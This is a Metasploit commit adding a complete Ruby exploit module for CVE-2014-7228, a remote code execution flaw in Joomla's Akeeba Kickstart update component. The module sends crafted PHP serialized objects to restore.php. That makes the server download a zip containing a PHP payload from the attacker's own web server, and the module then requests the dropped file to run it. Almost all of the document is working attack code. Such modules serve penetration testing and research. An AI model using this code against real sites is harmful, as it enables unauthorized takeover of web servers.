Land rapid7#3989, @us3r777's exploit for CVE-2014-7228, Joomla Update unserialize

jvazquez-r7 · jvazquez-r7 · commit c77a0984bd52 · 2014-10-20T13:39:08.000-05:00
the commit.
 empty message aborts
diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier
+        3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba
+        component, which is responsible for Joomla! updates. Nevertheless it is worth to note
+        that this vulnerability is only exploitable during the update of the Joomla! CMS.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Johannes Dahse',               # Vulnerability discovery
+          'us3r777 <us3r777[at]n0b0.so>'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-7228' ],
+          [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
+          [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
+          [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
+        ],
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 29 2014",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
+        OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 5])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
+    )
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def primer
+    srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"
+
+    php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
+    php_filename = rand_text_alpha(8 + rand(8)) + '.php'
+
+    # Create the zip archive
+    print_status("Creating archive with file #{php_filename}")
+    zip_file = Rex::Zip::Archive.new
+    zip_file.add_file(php_filename, payload.encoded)
+    @zip = zip_file.pack
+
+    # First step: call restore to run _prepare() and get an initialized AKFactory
+    print_status("#{peer} - Sending PHP serialized object...")
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
+      'vars_get'  => {
+        'task'    => 'stepRestore',
+        'factory' => Rex::Text.encode_base64(php_serialized_akfactory)
+      }
+    })
+
+    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
+      print_status("#{res.code}\n#{res.body}")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
+    end
+
+    # Second step: modify the currentPartNumber within the returned serialized AKFactory
+    json = /###(.*)###/.match(res.body)[1]
+    begin
+      b64encoded_prepared_factory = JSON.parse(json)['factory']
+    rescue JSON::ParserError
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")
+    end
+
+    prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
+    modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
+
+    print_status("#{peer} - Sending initialized and modified AKFactory...")
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
+      'vars_get'  => {
+        'task'    => 'stepRestore',
+        'factory' => Rex::Text.encode_base64(modified_factory)
+      }
+    })
+
+    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
+    end
+
+    register_files_for_cleanup(php_filename)
+
+    print_status("#{peer} - Executing payload...")
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
+    }, 2)
+
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+    rescue Timeout::Error
+      # When the server stops due to our timeout, this is raised
+    end
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    if @zip && request.uri =~ /\.zip$/
+      print_status("Sending the ZIP archive...")
+      send_response(cli, @zip, { 'Content-Type' => 'application/zip' })
+      return
+    end
+
+    print_status("Sending not found...")
+    send_not_found(cli)
+  end
+
+end
